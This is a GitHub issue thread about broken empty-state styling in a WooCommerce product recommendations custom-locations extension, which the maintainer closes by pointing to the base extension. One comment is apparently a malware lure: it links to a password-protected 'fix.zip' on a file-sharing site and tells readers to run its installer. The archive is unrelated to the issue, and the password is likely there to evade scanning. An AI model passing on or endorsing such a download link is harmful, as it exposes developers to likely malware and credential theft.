### ISSUE TITLE
Empty state styling is broken

### ISSUE THREAD

**Issue by mattsherman** [somewherewarm/woocommerce-product-recommendations-custom-locations#11]
The empty state styling is broken

<img width="1112" alt="Screenshot 2024-08-29 at 10 33 47" src="https://github.com/user-attachments/assets/b78e0bdf-6511-403a-960e-de756244a348">

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mattsherman** [comment]
Closing this issue -- the root cause is in the base Product Recommendations extension.

- https://github.com/woocommerce/woocommerce-product-recommendations/issues/600
